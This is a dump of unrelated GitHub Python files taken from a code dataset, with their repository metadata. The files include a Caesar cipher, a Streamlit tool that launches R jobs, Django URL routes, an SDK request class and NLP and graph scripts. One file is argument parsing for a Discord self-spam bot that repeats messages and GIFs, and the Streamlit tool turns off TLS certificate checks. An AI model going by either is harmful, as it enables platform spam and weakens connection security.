time.sleep(retry_interval)\n continue\n break\n return result\n\nurl = 'https://httpstat.us/500/cors'\n# url ='https://google.com'\nwith url_open_retry(url, retries= 3, retry_interval= 2) as result_search:\n print(result_search)\n\n# print(url_open_retry('https://httpstat.us/500/cors', retries= 3, retry_interval= 2))","repo_name":"tloureiro/cmip6_downloader","sub_path":"test/4_record_fetch_retry.py","file_name":"4_record_fetch_retry.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"21056193810","text":"__author__ = \"Alejandro Garau Madrigal\"\n\n\ndef caesar_cipher(input_text: str, offset: int = 3) -> str:\n \"\"\"\n The mighty function to cipher a text using caesar algorithm.\n :param input_text: text to cipher\n :param offset: value to shift. The default is 3\n :return: ciphered text\n \"\"\"\n result = ''\n for current_char in input_text:\n ord_current = ord(current_char)\n if 65 <= ord_current <= 90:\n result += chr((((ord_current - 65) + offset) % 26) + 65)\n elif 97 <= ord_current <= 122:\n result += chr((((ord_current - 97) + offset) % 26) + 97)\n else:\n result += current_char\n return result\n\n\ndef caesar_decipher2(input_text: str, offset: int = 3) -> str:\n \"\"\"\n Versión wena y gorda.\n :param input_text: texto a descrifrar\n :param offset: el offset\n :return: el texto descifrado\n \"\"\"\n return caesar_cipher(input_text, (26 - offset))\n","repo_name":"Alkesst/PracticasSeguridad","sub_path":"practica1/ejercicio3.py","file_name":"ejercicio3.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"13454390940","text":"# 3) Vous trouverez ci-dessous une liste contenant des détails sur plusieurs séries télévisées.\n\nseries = [\n {\"title\": \"Breaking Bad\", \"seasons\": 5, \"initial_release\": 2008},\n {\"title\": \"Fargo\", \"seasons\": 4, \"initial_release\": 2014},\n {\"title\": \"Firefly\", \"seasons\": 1, \"initial_release\": 2002},\n {\"title\": \"Rick and Morty\", \"seasons\": 4, \"initial_release\": 2013},\n {\"title\": \"True Detective\", \"seasons\": 3, \"initial_release\": 2014},\n {\"title\": \"Westworld\", \"seasons\": 3, \"initial_release\": 2016},\n ]\n# Utilisez votre fonction, print_show_info, et une boucle for, pour itérer sur la liste series, et appelez votre fonction une fois pour chaque itération, en passant chaque dictionnaire. Vous devriez vous retrouver avec chaque série imprimée dans le format approprié.\n\ndef print_show_info(show):\n print(f\"{show['title']} ({show['initial_release']}) - {show['seasons']} saison(s)\")\n\n\nfor show in series:\n print_show_info(show)","repo_name":"MiKL5/Python","sub_path":"exercises/practice12/12.3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"15227953819","text":"\nimport streamlit as st\nimport datetime,os,time,psutil\nfrom streamlit import session_state\nimport json\nfrom app import app\nimport requests\n\n\nwith open('config.json', 'r') as f:\n config = json.load(f)\n\n\nst.title( \"MIDistNet Remote Site Management Tools\")\n\nst.header('MIDistNet Remote site configure information')\n\nclient_name = st.text_input('Remote site name:', config['host_name'])\nserver_app_addr = st.text_input('Central Site API URL:', config['server_app'])\nif config['remote_public_ip'] == '127.0.0.1':\n config['remote_public_ip'] = app.config['public_ip']\nremote_public_ip = st.text_input('remote public IP address:', config['remote_public_ip'])\nsave_config_clicked = st.button('Save configuration')\n\nif save_config_clicked: \n config['host_name'] = client_name.strip()\n config['server_app'] = server_app_addr.strip()\n config['remote_public_ip'] = remote_public_ip.strip()\n with open('config.json', 'w') as f:\n json.dump(config, f)\n\n\nst.header('MIDistNet Remote Site Job')\n\nif 'task_id' not in st.session_state:\n st.session_state['task_id'] = ''\n\nif 'task_detail' not in st.session_state:\n st.session_state['task_detail'] = {}\n\nif 'server_data' not in st.session_state:\n st.session_state['server_data'] = {}\n\nst.caption(\"Remote Host container local IP: {}\".format(app.config['client_ip']))\n\ntask_id = st.text_input('Task id').strip()\nclient_ip = st.text_input('Remote Site Public IP:', remote_public_ip)\nclient_port = st.text_input('Remote Site Public Port:', app.config['client_port'])\n\nget_task_id_clicked = st.button('Get Task Detail')\nif get_task_id_clicked and len(task_id) > 10:\n post_curl = '{}/read_task/{}'.format(server_app_addr,task_id)\n r = requests.get(post_curl,verify=False)\n r_json = json.loads(r.json()['data'])\n if len(r_json) == 0 :\n st.write(\"Task does not exist\")\n st.session_state['task_id'] = ''\n else:\n task_detail = r_json['0']\n st.session_state['task_id'] = task_detail['task_id']\n st.session_state['task_detail'] = task_detail\n# st.write (task_detail)\nif st.session_state['task_id'] != '':\n task_detail = st.session_state['task_detail']\n st.write(\"Task ID: \", task_detail['task_id'])\n st.write(\"Total planned Remote Sites: \", str(task_detail[\"total_remote_sites\"]))\n st.write(\"Acknowledged Remote Sites :\", str(task_detail[\"registered_remote_sites\"]))\n st.write(\"Method: \", task_detail[\"method\"])\n st.write(\"Missing variables in column: \" , task_detail[\"missing_variables\"])\n st.write(\"Model: \", task_detail[\"model\"])\n# st.write(\"Task Status: \", task_detail[\"status\"])\n st.write(\"Central Site Public IP: \", task_detail[\"server_ip\"])\n# st.write(\"Central Site Public Port: \", task_detail[\"server_port_from\"])\n\nregisiter_button = st.button('Acknowledge')\n\nif regisiter_button : \n if len(task_id) > 10 : \n jsondata = {'task_id':task_id,\n 'client_ip':client_ip,\n 'client_port':client_port,\n 'client_name':client_name \n }\n r_reg = requests.post(server_app_addr+'/register', json=jsondata,verify=False)\n st.session_state['server_data'] = r_reg.json() \n# st.write(st.session_state['server_data'])\n st.write(r_reg.json()['message'])\n\ndata_file = './data/dummy.txt'\nuploaded_file = st.file_uploader(\"Specify local file\")\n\n\nif uploaded_file is not None:\n data_file = './data/' + client_ip + '_' + client_port + '_' + uploaded_file.name\n with open(data_file,\"wb\") as f:\n f.write(uploaded_file.getbuffer())\n\ncols_1 = st.columns(6)\n\nrun_button = cols_1[1].button('Run')\nrefresh_button = cols_1[2].button('Refresh')\nstop_button = cols_1[3].button('Stop')\nclear_all_R = cols_1[4].button('Kill All R porcess')\ncols_1[0].write('Remote job:')\n\nstatus_placeholder = st.empty()\nstatus_text = status_placeholder.text_area('Runing Status', value=f' ',key='Status', disabled = True )\n\n\nimport subprocess\n\nif 'pid' not in st.session_state:\n st.session_state['pid'] = None\n\ndef run_command(args):\n\n status_text = status_placeholder.text_area('Runing Status', value=f\"Running '{' '.join(args)}'\",key='Status', disabled = True )\n\n running_logs = open(st.session_state['log_file'], 'w')\n st.session_state['log'] = running_logs\n\n p = subprocess.Popen(args, cwd=\"./code/\",shell=False, stdout=running_logs,stderr=running_logs) # subprocess.PIPE\n\n st.session_state['pid'] = p\n\n stdout=None\n stderr=None\n time.sleep(2)\n\n try:\n stdout, stderr = p.communicate(timeout = 2)\n except:\n display_text = f\"Running '{' '.join(args)}' \\n\" \n display_text += ' Job with PID {} is runing at background \\n'.format(p.pid)\n if stdout :\n display_text += stdout.decode('utf-8') + '\\n'\n if stderr :\n display_text += stderr.decode('utf-8') + '\\n'\n status_text = status_placeholder.text_area('Runing Status', value=display_text ,key='Status', disabled = True )\n else:\n display_text = 'Job Finished \\n'\n if stdout :\n display_text += stdout.decode('utf-8') + '\\n'\n if stderr :\n display_text += stderr.decode('utf-8') + '\\n'\n log_text=''\n if st.session_state['log']:\n st.session_state['log'].flush()\n with open(st.session_state['log_file'], 'r') as f:\n log_text = f.read()\n display_text = ' Job with PID {} was aborted unexpected \\n Click stop to clear it. \\n {} '.format(st.session_state['pid'].pid,log_text)\n status_text = status_placeholder.text_area('Runing Status', value=display_text ,key='Status', disabled = True )\n\n\n# try:\n# result.check_returncode()\n# status_text = status_placeholder.text_area('Runing Status', value= result.stdout ,key='Status', disabled = True )\n# except subprocess.CalledProcessError as e:\n# status_text = status_placeholder.text_area('Runing Status', value= result.stderr ,key='Status', disabled = True )\n# raise e\n\ndef run_command_debug(args):\n status_placeholder = st.empty()\n status_text = status_placeholder.text_area('Runing Status', value=f\"Running '{' '.join(args)}'\",key='Status', disabled = True )\n\n result = subprocess.run(args, cwd=\"./code/\", capture_output=True, text=True)\n st.session_state['pid'] = result\n\n try:\n result.check_returncode()\n status_text = status_placeholder.text_area('Runing Status', value= result.stdout ,key='Status', disabled = True )\n except subprocess.CalledProcessError as e:\n status_text = status_placeholder.text_area('Runing Status', value= result.stderr ,key='Status', disabled = True )\n# raise e\n\n \nif run_button :\n\n# this is not working\n# if debug_option:\n# refresh_button.enabled = False\n# stop_button.enabled = False\n \n\n R_runtime_file = client_ip + '_' + client_port + '_r_runtime.R' \n\n if 'ICE' in st.session_state['server_data']['core_function'] :\n R_func_str = \"\"\"\n\nsource(\"{method}/{method}Remote.R\")\nargs = commandArgs(trailingOnly=TRUE)\nX=as.matrix(read.table(file=args[1]))\ncolnames(X) <- NULL\n\n{method}Remote(X,\"{client_port}\",\"{server_ip}\",\"{server_port}\")\n\n \"\"\".format(method = st.session_state['server_data']['core_function'],\n client_port = st.session_state['server_data']['client_port'],\n server_ip = st.session_state['server_data']['server_ip'],\n server_port = st.session_state['server_data']['server_port']\n )\n\n else:\n R_func_str = \"\"\"\n\nsource(\"{method}/{method}Remote.R\")\nargs = commandArgs(trailingOnly=TRUE)\n\nX=as.matrix(read.table(file=args[1]))\ncolnames(X) <- NULL\n\n{method}Remote(X,{missing},\"{client_port}\",\"{server_ip}\",\"{server_port}\")\n\n \"\"\".format(method = st.session_state['server_data']['core_function'],\n missing = st.session_state['server_data']['missing_variables'],\n client_port = st.session_state['server_data']['client_port'],\n server_ip = st.session_state['server_data']['server_ip'],\n server_port = st.session_state['server_data']['server_port']\n )\n\n\n with open('./code/'+R_runtime_file,\"w\") as f:\n f.write(R_func_str)\n\n# st.write(R_func_str)\n\n# if debug_option:\n# run_command_debug(['Rscript','--vanilla', R_runtime_file, '../'+ data_file])\n# else:\n\n log_file = './code/{}.txt'.format(R_runtime_file)\n st.session_state['log_file'] = log_file\n\n run_command(['Rscript','--vanilla', R_runtime_file, '../'+ data_file]) \n\nif refresh_button:\n if st.session_state['pid'] :\n stdout=None\n stderr=None\n\n try:\n stdout, stderr = p.communicate(timeout = 1 )\n except:\n proc = psutil.Process(st.session_state['pid'].pid)\n# st.write( proc.status())\n if proc.status() == psutil.STATUS_ZOMBIE:\n if st.session_state['log']:\n st.session_state['log'].flush()\n log_text=''\n with open(st.session_state['log_file'], 'r') as f:\n log_text = f.read()\n display_text = ' Job with PID {} was aborted unexpected \\n Click stop to clear it. \\n {} '.format(st.session_state['pid'].pid,log_text)\n else: \n display_text = ' Job with PID {} is runing at background \\n'.format(st.session_state['pid'].pid)\n if stdout :\n display_text += stdout.decode('utf-8') + '\\n'\n if stderr :\n display_text += stderr.decode('utf-8') + '\\n'\n status_text = status_placeholder.text_area('Runing Status', value=display_text ,key='Status', disabled = True )\n else:\n display_text = 'Job Finished \\n'\n if stdout :\n display_text += stdout.decode('utf-8') + '\\n'\n if stderr :\n display_text += stderr.decode('utf-8') + '\\n'\n status_text = status_placeholder.text_area('Runing Status', value=display_text ,key='Status', disabled = True )\n\ndef findandKillProcessIdByName(processName):\n listOfProcessObjects = []\n #Iterate over the all the running process\n for proc in psutil.process_iter():\n try:\n pinfo = proc.as_dict(attrs=['pid', 'name', 'create_time'])\n # print(pinfo)\n # Check if process name contains the given name string.\n if processName == pinfo['name'] :\n listOfProcessObjects.append(pinfo['pid'])\n except (psutil.NoSuchProcess, psutil.AccessDenied , psutil.ZombieProcess) :\n pass\n for x in listOfProcessObjects:\n p_R = psutil.Process(x)\n p_R.kill()\n return listOfProcessObjects;\n \nif clear_all_R:\n findandKillProcessIdByName('R')\n \nif stop_button :\n if st.session_state['pid'] :\n status_text = status_placeholder.text_area('Runing Status', value=\"Stopped process with pid: {}\".format(st.session_state['pid'].pid) ,key='Status', disabled = True )\n# st.write(\"Stopped process with pid:\", st.session_state['pid'].pid )\n st.session_state['pid'].kill()\n st.session_state['pid'] = None\n\n\nst.write('Software Version : V_20220801')\n","repo_name":"Luyaochen1/midn_gui","sub_path":"remote/MIDN_Remote/streamlit/midn_remote_st.py","file_name":"midn_remote_st.py","file_ext":"py","file_size_in_byte":11095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"386064343","text":"import os\nfrom itertools import product\nfrom collections import deque\n\n'''https://raw.githubusercontent.com/mebeim/aoc/master/2022/solutions/day18.py'''\n\n\ndef readInput(filename: str):\n\n script_location = os.path.dirname(os.path.realpath(__file__))\n input_file_path = os.path.join(script_location, filename)\n\n cubes = {}\n with open(input_file_path, 'r') as f:\n for line in f:\n coords = tuple(map(int, line.split(',')))\n cubes[coords] = 6\n return cubes\n\n\ndef neighbor(x, y, z):\n yield (x + 1, y, z)\n yield (x - 1, y, z)\n yield (x, y + 1, z)\n yield (x, y - 1, z)\n yield (x, y, z + 1)\n yield (x, y, z - 1)\n\n\ndef escape(cubes, node, rangex, rangey, rangez):\n queue = deque([node])\n visited = set()\n cnt = 0\n\n while queue:\n p = queue.popleft()\n if p in visited:\n continue\n\n x, y, z = p\n if x not in rangex or y not in rangey or z not in rangez:\n return (visited, 0)\n\n visited.add(p)\n\n for n in neighbor(x, y, z):\n if n in cubes:\n cnt += 1\n elif n not in visited:\n queue.append(n)\n\n return (visited, cnt)\n\n\ndef total_surface_area(cubes):\n for c in cubes:\n for n in neighbor(*c):\n if n in cubes:\n cubes[c] -= 1\n faces = sum(cubes.values())\n return faces\n\n\ndef bbox(cubes):\n minx = miny = minz = float('inf')\n maxx = maxy = maxz = float('-inf')\n for x, y, z in cubes:\n minx, maxx = min(x, minx), max(x, maxx)\n miny, maxy = min(y, miny), max(y, maxy)\n minz, maxz = min(z, minz), max(z, maxz)\n rangex = range(minx, maxx + 1)\n rangey = range(miny, maxy + 1)\n rangez = range(minz, maxz + 1)\n\n return (rangex, rangey, rangez)\n\n\ndef part1(inputFile: str):\n cubes = readInput(inputFile)\n faces = total_surface_area(cubes)\n return faces\n\n\ndef part2(inputFile: str):\n cubes = readInput(inputFile)\n faces = total_surface_area(cubes)\n rangex, rangey, rangez = bbox(cubes)\n all_visited = set()\n for n in product(rangex, rangey, rangez):\n if n not in all_visited and n not in cubes:\n visited, cnt = escape(cubes, n, rangex, rangey, rangez)\n all_visited |= visited\n faces -= cnt\n return faces\n\n\ndef test():\n print('---- TEST ----')\n filename = 'test_input.txt'\n assert part1(filename) == 64\n\n print('Part 1 OK')\n assert part2(filename) == 58\n print('Part 2 OK\\n')\n\n\ndef main():\n print('\\n---- MAIN ----')\n filename = 'input.txt'\n\n solution_part1 = part1(filename)\n print(f'Solution for Part 1: {solution_part1}')\n assert solution_part1 == 4580\n\n solution_part2 = part2(filename)\n print(f'Solution for Part 2: {solution_part2}\\n')\n assert solution_part2 == 2610\n\n\nif __name__ == '__main__':\n test()\n main()\n","repo_name":"siimveske/AOC","sub_path":"2022/day18/day_18_boiling_boulders.py","file_name":"day_18_boiling_boulders.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6137725502","text":"\"\"\"educacao_3_0 URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom site_est.views import index, elements, generic, aula, web, edu, labs, lab01, lab02, lab03, lab04, lab05, lab06, lab07, lab08, book_list, upload\n\n\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', index),\n path('elements/', elements),\n path('generic/', generic),\n path('aula/', aula),\n path('web/', web),\n path('edu/', edu),\n path('labs/', labs),\n path('lab01/', lab01),\n path('lab02/', lab02),\n path('lab03/', lab03),\n path('lab04/', lab04),\n path('lab05/', lab05),\n path('lab06/', lab06),\n path('lab07/', lab07),\n path('lab08/', lab08),\n path('book_list/', book_list),\n path('book_list/upload/', upload)\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Benedito-Medeiros-Neto-UnB/TacProgWeb","sub_path":"EDU 3.0 TUTORIAIS 1 2020/Edu 3.0_TAC-master/educacao_3_0/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"35025947543","text":"class FormMixin:\n def get_error(self):\n if hasattr(self, 'errors'): #hasattr() 函数用于判断对象是否包含对应的属性。\n #json格式的数据\n errors_json = self.errors.get_json_data().values()\n # print(error_json) #<QuerySet [{'id': 1, 'name': '首页'}, {'id': 2, 'name': 'python入门'}, {'id': 3, 'name': 'python web'}]>\n err_msg_list = []\n for item in errors_json:\n err_msg_list.append(item[0].get('message'))\n\n err_msg_str = '/'.join(err_msg_list) # 拼接错误信息为一个字符串\n return err_msg_str\n return None\n\n","repo_name":"juehuan182/QmpythonBlog","sub_path":"util/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"9891219776","text":"import numpy as np\n\nfrom Automated_Design.gen_schlegel import create_2d_mapping\n\n\ndef coords_are_almost_equal(a, b, threshold=0.001):\n a_x, a_y = a\n b_x, b_y = b\n x_almost_equal = abs(a_x - b_x) < threshold\n y_almost_equal = abs(a_y - b_y) < threshold\n return x_almost_equal and y_almost_equal\n\n\ndef test_create_2d_mapping_using_tetrahedron():\n edges = np.array([[2, 0],\n [1, 0],\n [3, 1],\n [3, 0],\n [2, 1],\n [3, 2]])\n coordinates = np.array([[0., 0., 0.612372],\n [-0.288675, -0.5, -0.204124],\n [-0.288675, 0.5, -0.204124],\n [0.57735, 0., -0.204124]])\n faces = [[0, 2, 1], [0, 1, 3], [0, 3, 2], [1, 2, 3]]\n xycoords = create_2d_mapping(edges, coordinates, faces)\n\n # Ideally, these assertions would assure that three of the four nodes\n # are arranged in an equilateral triangle scaled to sit on top of the\n # unit circle with the fourth node exactly in the middle of the other\n # three. But, since I'm not clever enough to know how to write those\n # assertions exactly, I'm starting with asserting it results in both a\n # possible solution and the solution I know it will reach given how\n # the function currently works.\n\n m = 3.**(1./2.)/2\n\n # The fourth node happened to be picked as center:\n assert coords_are_almost_equal([0, 0], xycoords[3])\n # The first three nodes all surround the fourth node.\n # The first node happened to be picked to be directly above center:\n assert coords_are_almost_equal([1, 0], xycoords[0])\n # The second is bottom left:\n assert coords_are_almost_equal([-.5, -m], xycoords[1])\n # The third is bottom right:\n assert coords_are_almost_equal([-.5, m], xycoords[2])\n","repo_name":"kritikaasri/DAEDALUS-clone","sub_path":"tests/test_gen_schlegel.py","file_name":"test_gen_schlegel.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73627969079","text":"from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest\n\n\nclass DescribeAttackSourceRequest(JDCloudRequest):\n \"\"\"\n 查询攻击来源\n \"\"\"\n\n def __init__(self, parameters, header=None, version=\"v1\"):\n super(DescribeAttackSourceRequest, self).__init__(\n '/attacklog/{attackLogId}:describeAttackSource', 'GET', header, version)\n self.parameters = parameters\n\n\nclass DescribeAttackSourceParameters(object):\n\n def __init__(self, attackLogId, ip):\n \"\"\"\n :param attackLogId: 攻击记录 Id\n :param ip: DDoS 防护包已防护的公网 IP. <br>- 使用 <a href='http://docs.jdcloud.com/anti-ddos-protection-package/api/describeprotectediplist'>describeProtectedIpList</a> 接口查询 DDoS 防护包已防护的公网 IP\n \"\"\"\n\n self.attackLogId = attackLogId\n self.ip = ip\n\n","repo_name":"jdcloud-api/jdcloud-sdk-python","sub_path":"jdcloud_sdk/services/antipro/apis/DescribeAttackSourceRequest.py","file_name":"DescribeAttackSourceRequest.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"40"} +{"seq_id":"11372040479","text":"terminal = \"-m message gifs -g -q -t 10\"\nprint(terminal)\nter = terminal.split()\nprint(ter)\n\n\"\"\"\n -m + сообщение\n -g будут гифки\n -t + время до отправки\n -q количество\n\"\"\"\nstroka = \"\"\nti = 0\nqu = 1\ng = False\n\nfor i in ter:\n if i == \"-m\":\n m = True\n t = False\n q = False\n continue\n elif i == \"-g\":\n g = True\n continue\n elif i == \"-t\":\n t = True\n m = False\n q = False\n continue\n elif i == \"-q\":\n q = True\n t = False\n m = False\n continue\n\n if m:\n stroka += i + \" \"\n elif t:\n ti += int(i)\n elif q:\n qu += int(i)\n\nprint(stroka)\nprint(g)\nprint(ti)\nprint(qu)\n\n# for i in range(0, int(text)):\n# test = ''.join(choice(ascii_uppercase) for i in range(10)) # рандомная гифка из файла\n# await ctx.send(embed=discord.Embed(description=test + \" \" + text)) # выделленный техт\n# lines = open('gifer').read().splitlines()\n# myline = random.choice(lines)\n# print(myline)\n# await ctx.send(embed=discord.Embed().set_image(url=myline)) # Скинуть gif по url\n# await ctx.send(file=discord.File('giphy.gif')) # Локально скинуть gif\n","repo_name":"SugawaraKou/Discord_Self_spam_bot","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"111304987","text":"from __future__ import division\n# CIS 511 NLP - Assignment 1 - Collocation Identification\n\n\"\"\"\nCreated on Sat Feb 2 20:30:18 2019\n\n@author: Siyu Yang\n@unique name: siyuya\n@UMID:76998080\n\"\"\"\n\nimport string\nimport math\nimport sys\n\n#=== Functions ===#\n\n# 1) Load Files and create unigram dictionary\ndef create_unigram(filename):\n unigram_dict = {}\n unigram_num = 0\n with open(filename,'r') as f:\n for line in f:\n splitLine = line.split()\n for word in splitLine: \n # store unigram (no tokens of only punctuation)\n if word not in string.punctuation:\n #count the number of unigrams\n unigram_num += 1\n if word in unigram_dict:\n unigram_dict[word] += 1\n else:\n unigram_dict[word] = 1\n return unigram_dict,unigram_num\n \n# 2) Load Files and create bigram dictionary \ndef create_bigram(filename):\n bigram_dict = {}\n bigram_num = 0\n pre_word = \".\"\n with open(filename,'r') as f:\n for line in f:\n splitLine = line.split()\n for word in splitLine:\n if word not in string.punctuation:\n # store bigram (no tokens of only punctuation)\n if pre_word not in string.punctuation:\n #count the number of bigrams\n bigram_num += 1\n bigram = pre_word + ' ' + word\n if bigram in bigram_dict:\n bigram_dict[bigram] += 1\n else:\n bigram_dict[bigram] = 1\n \n # set next pre_word\n pre_word = word\n \n # discard bigrams that occur less than 5 times\n bigram_dict = { bigram:count for bigram, count in bigram_dict.items() if count >=5 }\n return bigram_dict, bigram_num\n\n\n\n# 3) Create Bigram Matrices\ndef create_matrices(bigram_dict,N):\n '''\n @param:\n bigram_dict: the dictionary of bigram\n N: the total number of the bigrams\n \n @return:\n matrices: the dictionary of the matrix for every bigram\n word1_dict: the dictionary of the first word\n word2_dict: the dictionary of the second word\n '''\n # create dictionaries and save word1 and word2 counts in dictionaries\n word1_dict = {}\n word2_dict = {}\n\n # loop through every bigram in the dictionary\n for bigram,value in bigram_dict.items():\n word1 = bigram.split()[0]\n word2 = bigram.split()[1] \n # store word1\n if word1 in word1_dict:\n word1_dict[word1] += 1\n else:\n word1_dict[word1] = 1 \n # store word2\n if word2 in word2_dict:\n word2_dict[word2] += 1\n else:\n word2_dict[word2] = 1\n\n\n # create dictionary and store matrix for each bigram\n matrices = {}\n\n for bigram,value in bigram_dict.items(): \n # extract each word1 & word2\n word1 = bigram.split()[0]\n word2 = bigram.split()[1]\n # 1st value: both word1 and word2 (bigram)\n a = bigram_dict[bigram] \n # 2rd value: only word2 occurences\n b = word2_dict[word2] - a \n # 3rd value: only word1 occurences\n c = word1_dict[word1] -a \n # 4th value: non word1 or word2\n d = N-a-b-c \n \n #store values as matrix \n matrix=[a,c,b,d]\n matrices[bigram] = matrix\n \n return matrices, word1_dict, word2_dict\n\n\n# 4) Calculate Chi-Square Score\ndef calculate_chi_square(matrices,N):\n '''\n @param:\n matrices: the dictionary of the matrix for every bigram\n N: the total number of the bigrams\n \n @return:\n chi_square_list: the dictionary of the chi-square scores\n '''\n chi_square_list = {}\n\n for bigram, matrix in matrices.items(): \n a = matrix[0]\n b = matrix[1]\n c = matrix[2]\n d = matrix[3]\n #calculate the chi-square score \n chi_square = (N * pow((a*d-b*c),2))/((a+b)*(a+c)*(b+d)*(c+d))\n # store score in dictionary with bigram as key\n chi_square_list[bigram] = chi_square\n\n return chi_square_list\n\n\n# 5) Calculate PMI Score\ndef calculate_PMI(matrices, N, N1, bigram_dict, word1_dict, word2_dict):\n '''\n @param:\n matrices: the dictionary of the matrix for every bigram\n bigram_dict: the dictionary of bigram\n N: the total number of the bigrams\n N1: the total number of the unigrams\n word1_dict: the dictionary of the first word\n word2_dict: the dictionary of the second word\n \n @return:\n chi_square_list: the dictionary of the PMI scores\n '''\n PMI_list = {}\n\n for bigram,matrix in matrices.items():\n word1 = bigram.split()[0]\n word2 = bigram.split()[1]\n \n # calculate PMI score\n p = bigram_dict[bigram]/N\n p1 = word1_dict[word1]/N1\n p2 = word2_dict[word2]/N1\n PMI = math.log(p/(p1*p2))\n # store score in dictionary with bigram as key\n PMI_list[bigram] = PMI\n \n return PMI_list\n \n\nif __name__ == \"__main__\":\n\n # 1) Load files, create dictionaries for bigrams and unigrams\n bigram_dict, N = create_bigram(sys.argv[1])\n unigram_dict, N1 = create_unigram(sys.argv[1])\n \n # 2) Load measure type\n measure= sys.argv[2]\n\n # 3) create bigram matrices and dictionaries for word1 and word2\n matrices, word1_dict, word2_dict = create_matrices(bigram_dict,N)\n \n # 4) calculate requested measurement score\n if measure == \"chi-square\":\n score = calculate_chi_square(matrices,N)\n if measure == \"PMI\":\n score = calculate_PMI(matrices, N, N1, bigram_dict, word1_dict, word2_dict)\n\n # 5) output top 20 ranked bigrams and scores\n top20 = sorted(score.items(), key=lambda item:item[1], reverse = True)[:20]\n for key,value in top20:\n print(key,value)\n\n","repo_name":"Siyu-Yang/CIS-511-NLP","sub_path":"p1/Collocations.py","file_name":"Collocations.py","file_ext":"py","file_size_in_byte":6019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28516171685","text":"#!/usr/bin/env python\n'''\nUsage: annotate_gexf.py -i <gexf> [-n <node_annot>] [-c <color_attr>] [-e <edge_annot>] [-w <weight_attr>] [--force-str]\n\nOptions:\n -i <gexf> input, read from stdin if omitted\n -n <node_annot> node annotation\n -c <color_attr> color attribute\n -e <edge_annot> edge annotation\n -w <weight_attr> weight attribute\n --force-str force attributes to have string type\n'''\n\nfrom __future__ import print_function\nimport sys\nimport signal\nimport logging\nsignal.signal(signal.SIGPIPE, signal.SIG_DFL)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s; %(levelname)s; %(funcName)s; %(message)s',\n datefmt='%y-%m-%d %H:%M:%S')\nimport xml.etree.cElementTree as etree\nimport numpy as np\nimport pandas as pd\n\nxmlns = {'default':'http://www.gexf.net/1.3', 'viz':'http://www.gexf.net/1.3/viz', 'xsi':'http://www.w3.org/2001/XMLSchema-instance'}\nattrs_tag = '{{{}}}attributes'.format(xmlns['default'])\nattr_tag = '{{{}}}attribute'.format(xmlns['default'])\nattvs_tag = '{{{}}}attvalues'.format(xmlns['default'])\nattv_tag = '{{{}}}attvalue'.format(xmlns['default'])\ncolor_tag = '{{{}}}color'.format(xmlns['viz'])\n\ndef read_node_annotation(filename, forcestr=False):\n if filename is None:\n return {},{}\n if forcestr:\n dat = pd.read_table(filename, dtype=str)\n else:\n dat = pd.read_table(filename)\n ctypes = get_column_type(dat)\n return dat.set_index('node').to_dict(),ctypes\n\ndef read_edge_annotation(filename, forcestr=False):\n if filename is None:\n return {},{}\n if forcestr:\n dat = pd.read_table(filename, dtype=str)\n else:\n dat = pd.read_table(filename)\n ctypes = get_column_type(dat)\n x = dat.set_index(['source','target']).to_dict()\n y = dat.set_index(['target','source']).to_dict()\n for name in x:\n x[name].update(y[name])\n return x,ctypes\n\ndef get_column_type(dat):\n col_types = dict()\n for name in dat.columns:\n ctype = dat[name].dtype\n if np.issubdtype(ctype, np.integer):\n col_types[name] = 'integer'\n elif np.issubdtype(ctype, np.float):\n col_types[name] = 'float'\n else:\n col_types[name] = 'string'\n return col_types\n\ndef main(args):\n logging.info(args)\n node_annot,node_ctypes = read_node_annotation(args['n'], forcestr=args['force-str'])\n logging.info(node_ctypes)\n edge_annot,edge_ctypes = read_edge_annotation(args['e'], forcestr=args['force-str'])\n logging.info(edge_ctypes)\n\n for prefix,uri in xmlns.items():\n if prefix == 'default':\n prefix = ''\n etree.register_namespace(prefix, uri)\n\n tree = etree.parse(args['i'])\n root = tree.getroot()\n graph = root.find('default:graph', xmlns)\n nodes = graph.find('default:nodes', xmlns)\n edges = graph.find('default:edges', xmlns)\n graph.remove(nodes)\n graph.remove(edges)\n attributes = graph.findall('default:attributes', xmlns)\n attr_classes = [x.attrib['class'] for x in attributes]\n if not 'node' in attr_classes:\n node_attributes = etree.SubElement(graph, attrs_tag, 